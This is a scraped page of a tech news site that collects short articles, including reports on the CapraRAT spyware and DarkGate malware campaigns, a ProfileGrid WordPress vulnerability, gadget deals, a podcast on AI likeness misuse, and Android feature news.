CapraRAT Android Spyware Campaign Targets Gamers, TikTokers

andreasc
-
0
CapraRAT Android Spyware Campaign Targets Gamers, TikTokers
[ad_1]

Researchers found a new malware campaign from the long-known CapraRAT Android spyware that impersonates legit apps. This time, the spyware mimics apps to target TikTok users, gamers, and other user groups.

CapraRAT Spyware Mimics Android Apps To Trick Users

According to a recent post from SentinelLabs, their researchers observed a new CapraRAT Android spyware campaign aimed at specific user groups, including TikTokers and gamers.

As explained, the researchers found four new APKs posing various apps, some even hiding behind legit applications. To help users potentially running the malicious applications on their devices, below we list the application and package names to spot.

  • Crazy Game (com.maeps.crygms.tktols): An app impersonating the legit gaming platform “Crazygames.com” to trick gamers.
  • Sexy Videos (com.nobra.crygms.tktols): An app redirecting to YouTube videos.
  • TikToks (com.maeps.vdosa.tktols): An app mimicking TikTok video platform, aimed at targeting TikTok users.
  • Weapons (com.maeps.vdosa.tktols): This app, bearing the logo “Forgotten Weapons” (mimicking a YouTube channel of the same name) aims at weapon fans.

While all these four apps seemingly aim to serve different user groups, all of them work similarly, hinting at the widespread radius of this CapraRAT campaign.

The Recent Campaign Exhibits A Sneaky Behavior

In brief, the attack begins when a victim user downloads any of these apps. Upon installation, the app asks several intrusive permissions from the users, including access to SMS, contacts, GPS location, read/write access to storage, camera, audio recording, screen recording, call history, permission to make calls, and manage network state.

As obvious, many of these permissions are really not necessary for a gaming or video app, which must raise alarms to the user. However, most users do not focus on individual app permissions, thus falling prey to such threats.

Besides these permissions, the new malware variant also exhibits a WebView feature to launch links to legit sites to trick users. Moreover, the malware now appears more of a spyware than a backdoor (unlike its previous campaigns) as it ditches permissions to install packages or authenticate accounts. This sneaky behavior may even trick the most savvy users, staying under the radar for extended periods.

CapraRAT is a known Android spyware belonging to a suspected Pakistani state-actor group, Transparent Tribe (aka APT 36, Operation C-Major). This group, known since 2016, has run numerous malicious campaigns against users, particularly targeting Indian victims.

Let us know your thoughts in the comments.


[ad_2]
Source link

Save $50 on the Google Pixel 8a for Prime Day

andreasc
-
0
Save $50 on the Google Pixel 8a for Prime Day
[ad_1]

Google’s Pixel A phones are usually a great deal. However, why not knock some more money off of your purchase? For Prime Day, you can get the Pixel 8a for $50 off. This knocks the price down to $449.99.

If you’re curious about Amazon Prime, new members can try it out for free with a 30-day trial.

The Pixel 8a is the most recent smartphone released by Google, and it brings the power of the Tensor G3 SoC. This makes it one of the most powerful phones at this price point. Along with that, you have Google’s top-of-the-line software optimization. This all makes for an incredibly smooth experience.

The selling point of Google’s Pixel devices is usually the camera. Google uses some advanced hardware and software for its cameras. This gives its Pixel A phones camera performance that rivals phones twice their price. If you’re looking for a phone that can produce amazing pictures, then you should pick up this phone.

As for the screen, Google fits its devices with some great displays. You’re looking at a 1080p+ AMOLED display. Not only does it look great, but it looks great when outdoors. It has a peak of 2000 nits of brightness.

Being a Pixel device, you can expect all of the latest and greatest from Android. You’ll receive software updates early along with the other Pixel devices. This includes new features, security patches, and bug and stability fixes. Also, you’ll be early to receive the latest Android platform upgrades. It comes with Android 14 out of the box, but it will be one of the first devices to get Android 15 when it comes out.

This is truly one of the best Android experiences that you can get your hands on. At $50 off for Prime Day, it’s a pretty good deal. You won’t be sorry.


[ad_2]
Source link

Samsung Android XR headset’s dev version could launch in October

andreasc
-
0
Samsung Android XR headset’s dev version could launch in October
[ad_1]

XR enthusiasts have been eagerly waiting for the launch of a new Samsung Android XR headset for a while now. The South Korean tech giant announced its collaboration with Google and Qualcomm for a new XR headset initiative in February last year. The device was expected to launch in Q1 2024 but was repeatedly pushed back.

The details regarding the new Samsung Android XR headset have been scarce, up until now. According to a report by Business Insider, Samsung will launch a developer version of its Android XR headset later this year.

Samsung could start giving out an early version of its Android XR headset to developers at SDC 2024

According to the source, Samsung will launch a version of its Android XR headset for developers in October. Samsung has previously indicated that it will introduce something new in the XR segment before 2024 ends. But, this is the first time we’ve heard a specific month mentioned.

The report didn’t provide an exact launch date for the developer version. However, there’s a Samsung Developer Conference on October 3. If the report is true, the company could showcase its Android XR headset at this event. The brand may also start giving out the early version of the device to developers around the same time. So they can start making applications for the new headset.

It’s worth mentioning that during the recent Unpacked event, Rick Osterloh, Google’s SVP of Platforms & Devices, briefly mentioned the upcoming XR platform. Furthermore, TM Roh, President of Samsung’s Mobile Division, revealed that the new XR platform is “coming this year”. However, Roh refrained from sharing any other details like the features or general availability of the upcoming XR platform-powered headset.

The commercial product is said to be showcased in March 2025

Furthermore, the latest report suggests that Samsung could showcase the commercial version of the Android XR headset in March 2025. As always with rumors, nothing is certain until the company makes an official announcement.

Unfortunately, there’s not a lot known about the upcoming XR headset that’s Samsung developing with Google and Qualcomm. It could be a mixed bag offering all VR (virtual reality), AR (augmented reality), and MR (mixed reality) experiences in a single device. Only time will tell, so stay tuned for more updates in the future.


[ad_2]
Source link

DarkGate Malware Exploiting Excel Files And SMB File Shares

andreasc
-
0
DarkGate Malware Exploiting Excel Files And SMB File Shares
[ad_1]

DarkGate, a Malware-as-a-Service (MaaS) platform, experienced a surge in activity since September 2023, employing various distribution methods, including email attachments, malicious ads, and compromised Samba shares. 

Initially a human-operated command-and-control infrastructure, DarkGate has evolved into a versatile tool offering remote access, crypto mining, and other malicious functionalities. 

The malware has been actively distributed across North America, Europe, and Asia, leveraging AutoIt or AutoHotkey scripts for initial infection. 

Exploit.IN forum post by DarkGate developer RastaFarEye in October 2023

Their actors launched a campaign in March 2024, using Excel files disguised as legitimate documents to deliver malicious payloads, primarily targeting North America but expanding to Europe and Asia.

Are you from SOC/DFIR Teams? - Sign up for a free ANY.RUN account! to Analyse Advanced Malware Files

The attack chain involves luring users to open Excel files with embedded links to publicly accessible Samba shares hosting VBS or JS scripts, which download and execute a PowerShell script, which in turn fetches and runs the final AutoHotKey-based DarkGate payload. 

The threat actors employed various evasion techniques, including obfuscation, legitimate software usage, and anti-malware detection checks, to hinder analysis and increase the malware’s persistence. 

Template used by .xlsx files used in this DarkGate campaign.

The malware employs anti-analysis techniques to evade detection by checking the system’s CPU to differentiate between virtual environments and physical hosts, potentially halting execution in controlled analysis settings. 

It scans for multiple anti-malware programs using specific directory paths and filenames, aiming to avoid triggering their detection mechanisms or even disabling them.

The malware’s ongoing evolution includes adding new anti-malware checks, demonstrating its adaptability to counter evolving security measures. 

DarkGate’s routine to check for the CPU is shown in a debugger.

Analysis Of DarkGate Samples Reveals XOR Key Variations

Two sets of DarkGate samples were examined where the first set shared the same campaign ID but had different XOR keys, while the second set shared both the campaign ID and the C2 server but also had distinct XOR keys. 

It indicates that DarkGate employs multiple XOR keys for the same campaign or C2 infrastructure, potentially hindering reverse engineering efforts and increasing malware resilience. 

DarkGate malware scans a host for specific processes and tools commonly used in malware analysis or virtual environments by employing a complex configuration decryption process involving XOR keys to conceal its behavior. 

While some configuration fields remain obscure, analysts have identified correlations between certain values and campaign identifiers. 

Multiple samples within the same campaign can utilize distinct XOR keys, suggesting an intentional obfuscation tactic to hinder analysis and understanding of DarkGate’s inner workings. 

Configuration data was extracted from a DarkGate sample first seen on April 16, 2024.

DarkGate C2 traffic, while appearing as unencrypted Base64-encoded HTTP POST requests, conceals obfuscated data, which can be decoded; further obfuscation exists. 

Unit 42 looked into an infection that happened on March 14, 2024, and found that five HTTP POST requests with nearly 218 KB of Base64-encoded data sent to nextroundstr.com could have leaked data. 

Although DarkGate’s primary function is unclear, its association with follow-on malware like Danabot and reported links to ransomware raise significant security concerns.

“Is Your System Under Attack? Try Cynet XDR: Automated Detection & Response for Endpoints, Networks, & Users!”- Free Demo


[ad_2]
Source link

Grab the Apple Watch Ultra 2 for $729 in Best Buy’s latest sale

andreasc
-
0
Grab the Apple Watch Ultra 2 for $729 in Best Buy’s latest sale
[ad_1]

Best Buy is holding its “Black Friday in July” sale right now, and it is seeing a ton of great deals ahead of Amazon’s Prime Day, which starts tomorrow. This includes the Apple Watch Ultra 2, which is now $729. That’s a savings of $70, which does bring it back down to its all-time lowest price.

The Apple Watch Ultra 2 was announced last September, as the successor to the very popular and successful Apple Watch Ultra. It, unfortunately, did not have a lot of changes from the original. But it did include the new double-pinch feature which is really useful when your hands are full. One of the big selling points of the Apple Watch Ultra 2 is the battery life over the regular Apple Watch. Apple touts that you can get 36 hours out of it, which is about two full days, depending on your usage. That’s double the regular Apple Watch’s battery life.

Buyers also love the Apple Watch Ultra 2 for the titanium casing and sapphire crystal display, which makes it almost impossible to scratch or shatter. Since this watch is made for adventurers and those that love to get dirty in nature. So using that material makes lots of sense.

With this deal, you can also trade in a watch to Best Buy. You won’t get a ton, as it looks like the most you can get is $265, but hey that’s better than nothing.

Buy at Best Buy


[ad_2]
Source link

Google nears $23 billion acquisition of cybersecurity startup Wiz

andreasc
-
0
Google nears $23 billion acquisition of cybersecurity startup Wiz
[ad_1]

Google is reportedly closing in on its biggest acquisition ever. The tech titan is on the verge of buying cloud cybersecurity startup Wiz for around $23 billion, The Wall Street Journal reports. The talks have already progressed to an advanced stage, people familiar with the matter told the publication. The biggest Google acquisition so far is Motorola Mobility, which it bought for $12.5 billion in 2012 and sold for $2.91 billion in 2014.

Google is in advanced talks for a $23 billion acquisition of Wiz

Founded in 2020 by four former Microsoft employees, Wiz is a New York-based cloud cybersecurity provider. It specializes in analyzing corporate cloud computing infrastructure for combinations of risk factors that could lead to security breaches. The startup uses data from Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud, and other cloud platforms to identify potential risk factors.

The firm’s solutions allow companies to “rapidly identify and remove critical risks” and secure their cloud platforms. In August 2022, Wiz claimed to be the fastest startup to scale from $1 million to $100 million in annual recurring revenue  (ARR). It allegedly achieved the feat in around 18 months. The startup has raised $1.9 billion in various funding rounds in its lifetime. Of that, $1 billion came in Series E funding in April 2024.

Wiz raised the money at a $12 billion valuation. Google is seemingly buying it for almost double that amount. The company likely sees Wiz’s technologies as a valuable addition to fortify its cloud business. The business division grew 28% in the first quarter of 2024, securing a revenue of $9.57 billion. The tech biggie would want to strengthen its security measures amid increasing demand for cloud-based generative AI tools.

Google has already invested big in acquiring cloud security startups. In January 2022, it acquired Israel-based startup Siemplify for $500 million. The firm followed up with a $5.4 billion acquisition of Mandiant later that year. Wiz might soon join the internet behemoth’s ever-growing cybersecurity umbrella. It seemingly wants to take no chance against fast-evolving threat actors who have hacked the servers of some of the biggest tech firms in recent years.

The deal might face strict regulatory scrutiny and could even fall through

While Google and Wiz look likely to agree on an acquisition deal, they may find it difficult to please the US regulators. The Biden administration has been tightening regulatory scrutiny on tech biggies. Time will tell whether the Android maker can bring another cloud security provider under its sleeve or if American lawmakers prevent that from happening on fair competition grounds. Expect more details in the coming weeks.


[ad_2]
Source link

Samsung Galaxy Z Flip 5 and Z Flip 6 get Google Wallet support on cover screens

andreasc
-
0
Samsung Galaxy Z Flip 5 and Z Flip 6 get Google Wallet support on cover screens
[ad_1]

The Samsung Galaxy Z Flip 5 and Z Flip 6now support Google Wallet on their cover screens, thanks to the MultiStar widget from Samsung’s Good Lock customization suite. Previously, Z Flip users could only make payments using the default card in Google Wallet without opening their phones. However, they had to open their devices to switch cards or access loyalty cards.This new functionality, likely enabled by a recent update to either MultiStar, Google Wallet, or Samsung’s One UI 6.1, allows users to add Google Wallet to their cover screen. To do this, they need to download Good Lock, a customization suite for Galaxy phones, and then use the MultiStar module to add the Google Wallet widget to the cover screen.

It’s important to note that this feature is only available on Z Flip 5 and Z Flip 6 devices running One UI 6.1 or later. For those who have these devices, the addition of Google Wallet to the cover screen is a welcome change, as it makes mobile payments even more convenient and streamlines the user experience.

Samsung’s Good Lock MultiStar module now supports Google Wallet on the Z Flip 5 and Z Flip 6 | Image credit — Android Police

The Z Flip series has always been popular for its unique foldable design and compact form factor. However, the limited functionality of the cover screen has been a common complaint among users. Samsung has been gradually improving this with each new model, and the addition of Google Wallet support is a significant step forward.

It’s unclear exactly when this support was added, but users have recently reported being able to use Google Wallet on their cover screens. This suggests that the feature may have been quietly rolled out in a recent update.

For those who rely on Google Wallet for their mobile payments, this new feature is a game changer. It eliminates the need to constantly open and close their phones to make payments, switch cards, or access loyalty cards. Everything can now be done directly from the cover screen.


[ad_2]
Source link

ProfileGrid WordPress Plugin Vulnerability Allowed Admin Access

andreasc
-
0
ProfileGrid WordPress Plugin Vulnerability Allowed Admin Access
[ad_1]

WordPress admins must update their websites with the latest ProfileGrid plugin release. A severe privilege escalation vulnerability in ProfileGrid plugin could allow admin access to target WordPress sites.

ProfileGrid Plugin Vulnerability Risked WordPress Sites

In a recent post, team Wordfence shared details about a serious privilege escalation vulnerability in the ProfileGrid plugin that threatened thousands of WordPress sites.

ProfileGrid—User Profiles, Groups, and Communities is a dedicated plugin for WordPress sites that allows users to set up user profiles, communities, directories, groups, and other interactive interfaces. The plugin currently boasts over 7,000 active installations, hinting at the huge number of websites potentially at risk due to the underlying plugin flaw.

As explained, the vulnerability affected the plugin’s pm_upload_image AJAX action due to a lack of validation. An authenticated adversary could exploit the flaw to gain elevated privileges, even gaining admin access to the target sites from subscriber-level access.

The vulnerability received the CVE ID CVE-2024-6411, achieving a high severity rating and a CVSS score 8.8. It first caught the attention of security researcher Tieu Pham Trong Nhan from TechlabCorp, who reported the matter via Wordfence’s bug bounty program, and won $488 bounty.

This vulnerability affected all plugin versions until version 5.8.9. Following this bug report, Wordfence coordinated with the plugin developers for a patch, which the developers then rolled out with ProfileGrid version 5.9.0 released earlier this month.

Although there appear no exploitation attempts of this flaw in the wild, the plugin’s official WordPress page currently shows only 36.7% running the latest release, whereas the rest of the users continue to run the older, vulnerable plugin versions. Hence, given the threat, it’s crucial for all WordPress users to update their sites with the latest plugin release as soon as possible.

Moreover, it’s also important to check all plugins running on their websites for possible security fixes in order to avoid potential threats.

Let us know your thoughts in the comments.


[ad_2]
Source link

How an AI “artist” stole a woman’s face, with Ali Diamond (Lock and Code S05E15)

andreasc
-
0
How an AI “artist” stole a woman’s face, with Ali Diamond (Lock and Code S05E15)
[ad_1]

This week on the Lock and Code podcast…

Full-time software engineer and part-time Twitch streamer Ali Diamond is used to seeing herself on screen, probably because she’s the one who turns the camera on.

But when Diamond received a Direct Message (DM) on Twitter earlier this year, she learned that her likeness had been recreated across a sample of AI-generated images, entirely without her consent.

On the AI art sharing platform Civitai, Diamond discovered that a stranger had created an “AI image model” that was fashioned after her. The model was available for download so that, conceivably, other members of the community could generate their own images of Diamond—or, at least, the AI version of her. To show just what the AI model was capable of, its creator shared a few examples of what he’d made: There was AI Diamond standing what looked at a music festival, AI Diamond with her head tilted up and smiling, and AI Diamond wearing, what the real Diamond would later describe, as an “ugly ass ****ing hat.”

AI image generation is seemingly lawless right now.

Popular AI image generators, like Stable Diffusion, Dall-E, and Midjourney, have faced valid criticisms from human artists that these generators are copying their labor to output derivative works, a sort of AI plagiarism. AI image moderation, on the other hand, has posed a problem not only for AI art communities, but for major social media networks, too, as anyone can seemingly create AI-generated images of someone else—without that person’s consent—and distribute those images online. It happened earlier this year when AI-generated, sexually explicit images of Taylor Swift were seen by millions of people on Twitter before the company took those images down.

In that instance, Swift had the support of countless fans who reported each post they found on Twitter that shared the images.

But what happens when someone has to defend themselves against an AI model made of their likeness, without their consent?

Today, on the Lock and Code podcast with host David Ruiz, we speak with Ali Diamond about finding an AI model of herself, what the creator had to say about making the model, and what the privacy and security implications are for everyday people whose likenesses have been stolen against their will.

For Diamond, the experience was unwelcome and new, as she’d never experimented using AI image generation on herself.

“I’ve never put my face into any of those AI services. As someone who has a love of cybersecurity and an interest in it… you’re collecting faces to do what?”

Tune in today to listen to the full conversation.

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.


[ad_2]
Source link

Google’s CameraX update prepares Ultra HDR rollout for third-party apps

andreasc
-
0
Google’s CameraX update prepares Ultra HDR rollout for third-party apps
[ad_1]

At its I/O 2024 developers’ conference in May, Google announced plans to support Ultra HDR image capture across all third-party apps with built-in camera functionality. It appears the company has made some progress towards this. It has updated the CameraX library with initial support for Ultra HDR capture, laying the groundwork for a public rollout.

Google prepares to bring Ultra HDR image capture to all camera apps

HDR or high dynamic range is an advanced camera technology that uses computational photography and image stacking to produce vibrant images with excellent contrast. Ultra HDR is a JPEG-based HDR image format created by Google. The company offers an API for Android 14 and higher that app developers can implement to capture HDR images on supported devices. These JPEG image files have an HDR gain map embedded in their metadata.

The benefit is that these pictures can be viewed on any device, even those without an HDR display. When not supported, users will see standard (SDR) JPEG images. But when supported, the HDR gain map is applied over the SDR version of the image to enhance the vibrancy and contrast of colors. Any camera app can capture these JPEG-based HDR images using Google’s Ultra HDR format as long as the device has the necessary hardware capabilities.

However, Google’s API system has limited its adoption, particularly on apps where photography isn’t a primary function, such as social media apps. The API that enables Ultra HDR for camera apps in Android 14 is part of Camera2, not CameraX. The former comes with the Android OS framework and offers advanced camera functionality. “Think full-fledged third-party camera apps with pro-level controls over multiple lenses,” Android expert Mishaal Rahman explains.

On the other hand, CameraX is bundled with the Jetpack support library and is better suited for social media apps and other apps that offer built-in camera functionality for adjacent features. While developers are free to select either API, CameraX’s simplicity means apps that aren’t necessarily camera apps usually forego Camera2. As such, they miss out on the latest or advanced features or get them later than regular camera apps. The same is happening with Ultra HDR.

Google has already made some progress

While the Ultra HDR API has been available on Camera2 since the beginning, Google is finally bringing it to CameraX. The company updated the CameraX library in April to support Ultra HDR image capture on all Android camera apps. Spotted by Rahman, the updated version (v1.4.0) isn’t available publicly yet. Maybe Google still has some work to do. He explained the technical tidbits of the feature in a lengthy post on Android Authority.

The gist is that your social images might soon be more vibrant. According to the report, Google Chrome is currently the only app that “fully” supports Ultra HDR images across Android and desktop. Hopefully, developers of other third-party apps will quickly adopt the updated version of the Jetpack CameraX library as soon as Google releases it. All high-end Android phones and some newer Windows PCs can display Ultra HDR images.


[ad_2]
Source link
1...333435...1,452Page 34 of 1,452